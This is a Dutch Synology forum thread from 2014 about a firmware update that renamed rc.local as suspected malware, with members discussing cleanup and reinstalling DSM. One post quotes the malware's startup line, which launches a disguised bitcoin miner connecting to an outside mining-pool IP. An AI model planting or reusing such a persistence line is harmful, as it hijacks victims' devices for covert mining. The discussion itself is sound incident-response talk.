Auteur Topic: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware  (gelezen 12227 keer)

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Beste forumleden,

Ik heb zojuist ook de NAS geupgrade naar 5.0-4528. Nu kreeg ik na de update een melding dat rc.local is renamed naar rc.local.bak vanwege mogelijke malware.
Ik kan zo snel niks hierover vinden op google.

Iemand enig idee, kan op het moment namelijk nog niet ssh gebruiken i.v.m. het onderweg zijn

Mvg,
Jarno
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #1 Gepost op: 22 oktober 2014, 16:04:05 »
In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.


Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #2 Gepost op: 22 oktober 2014, 16:33:48 »
Ben, Bedankt voor je reactie! Ik heb toch maar even met een omweg ssh gebruikt naar de desbetreffende Synology. Wat blijkt, het is nog een bitcoin miner van februari :o
Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

Is het verstandig om DSM opnieuw te installeren met behoud van de bestanden of is dit al voldoende?

  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #3 Gepost op: 22 oktober 2014, 17:05:04 »
Dit is wel voldoende om van die miner af te komen maar hij staat nog steeds ergens op je NAS.
Ook begreep ik dat die miner de resource monitor verving om geen 100% cpu te tonen.

Persoonlijk zou ik DSM er opnieuw opzetten, maar kan natuurlijk niet zien hoeveel ongemak dat voor jou oplevert.

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #4 Gepost op: 22 oktober 2014, 17:09:53 »
Ik heb nog gezocht naar de bekende mappen die met deze bitcoinminer er moesten zijn. Daarnaast is er ook geen proces te zien die mined. Net of dit alles al is verwijderd door Synology's update..
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #5 Gepost op: 22 oktober 2014, 17:15:28 »
Dat zeggen ze eigenlijk wel he.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1336
  • -Ontvangen: 7772
  • Berichten: 43.099
  • FIFO / LIFO
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #6 Gepost op: 22 oktober 2014, 17:24:55 »
Citaat
Net of dit alles al is verwijderd door Synology's update..
Mooi plus punt van deze update  ;D


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.3-25426-2   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.1-69057-4
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 6.2.4-25556-7   RT2600ac  SRM 1.2.5-8227-11
BeeDrive 1TB                                                                                                        MR2200ac  SRM 1.2.5-8227-11

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #7 Gepost op: 24 oktober 2014, 09:46:57 »
Als ik DSM er opnieuw op zet, kan ik dan alle instellingen terug zetten met de configuration backup? En werkt het dan eigenlijk hetzelfde als nu? Nog geen ervaring met de synology resetten namelijk :lol:
Synology is namelijk zelf niet zeker in hoeverre het na de update verwijderd is..
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 10
  • -Ontvangen: 1444
  • Berichten: 6.036
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #8 Gepost op: 24 oktober 2014, 10:07:31 »
Je kunt inderdaad de configuratie backuppen en dan na herinstallatie van DSM terugzetten. Dit werkt alleen niet voor de packages, die moet je opnieuw installeren en configureren.
Let wel op dat je de procedure uitvoert via de reset-knop en niet via DSM->Terug naar fabrieksinstellingen. Als je de laatste gebruikt wist de NAS ook al je data.

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #9 Gepost op: 24 oktober 2014, 10:45:17 »
Dienen de foto's ook uit de map photo gehaald te worden of overschrijft Photostation die map niet bij het installeren van dat pakket?
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 10
  • -Ontvangen: 1444
  • Berichten: 6.036
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #10 Gepost op: 24 oktober 2014, 10:57:44 »
Nee, data blijft gewoon staan. Het is wel aan te bevelen om een backup te maken voor herinstallatie, het kan tenslotte onverwacht fout gaan (eigenlijk hoor je sowieso een backup van je NAS te hebben). Met de backup functie van de NAS kun je ook de PhotoStation database backuppen. Die kun je dan na herinstallatie terugzetten, dan hoeft PhotoStation niet alles opnieuw te indexeren.

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #11 Gepost op: 24 oktober 2014, 12:02:53 »
In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.

Hallo, ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is. Op mijn systeem bestaat hij. Ik kan me in ieder geval niet herinneren dat ik dit bestand ooit zelf heb aangemaakt. Ik denk dat hij bij de installatie van iPKG meekwam.
Dit staat erin:

#!/bin/sh

# Optware setup
[ -x /etc/rc.optware ] && /etc/rc.optware start

exit 0

Bij mij is de rc.local tijdens de update met rust gelaten. DSM update scant zo te horen dus actief op de inhoud van de rc.local. En dat is een geruststellend idee. ik begin die Syno steeds beter te vinden. :-)


Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1336
  • -Ontvangen: 7772
  • Berichten: 43.099
  • FIFO / LIFO
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #12 Gepost op: 24 oktober 2014, 12:12:42 »
DAT is dan weer vreemd, zou hetzelfde verwachten bij jou als wat TS gebeurde.  :S


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.3-25426-2   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.1-69057-4
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 6.2.4-25556-7   RT2600ac  SRM 1.2.5-8227-11
BeeDrive 1TB                                                                                                        MR2200ac  SRM 1.2.5-8227-11

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #13 Gepost op: 24 oktober 2014, 12:15:36 »
Ik heb mijn pst hierboven even aangevuld met een extra opmerking: DSM update scant m.i. op de inhoud van /etc/rc.local, niet op het bestaan van het bestand zelf.  De inhoud van mijn rc.local is -zoals je ziet- tamelijk onschuldig.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1336
  • -Ontvangen: 7772
  • Berichten: 43.099
  • FIFO / LIFO
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #14 Gepost op: 24 oktober 2014, 12:20:10 »
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.3-25426-2   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.1-69057-4
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 6.2.4-25556-7   RT2600ac  SRM 1.2.5-8227-11
BeeDrive 1TB                                                                                                        MR2200ac  SRM 1.2.5-8227-11


 

DS118 gaat na laatste update niet meer in slaapstand, blijft continu aan.

Gestart door racinfoBoard NAS hardware vragen

Reacties: 7
Gelezen: 1535
Laatste bericht 08 augustus 2019, 14:08:04
door Birdy
Firmware update - SRM 1.2.4 - 8081 - *1* [patch]

Gestart door BabyloniaBoard Synology Router

Reacties: 8
Gelezen: 1597
Laatste bericht 15 oktober 2020, 14:39:42
door reinos
NZBGET is gestopt na update

Gestart door Hakkelaar1973Board NZBGet

Reacties: 3
Gelezen: 3022
Laatste bericht 12 juni 2021, 10:21:41
door Birdy
VERPLAATST: photo station functioneert niet meer na update dsm 7

Gestart door BirdyBoard Synology DSM 7.0

Reacties: 0
Gelezen: 559
Laatste bericht 05 oktober 2021, 23:47:50
door Birdy
DSM Version: 7.1-42661 Update 2

Gestart door HofstedeBoard Synology DSM 7.1

Reacties: 32
Gelezen: 4104
Laatste bericht 23 juni 2022, 11:57:35
door Birdy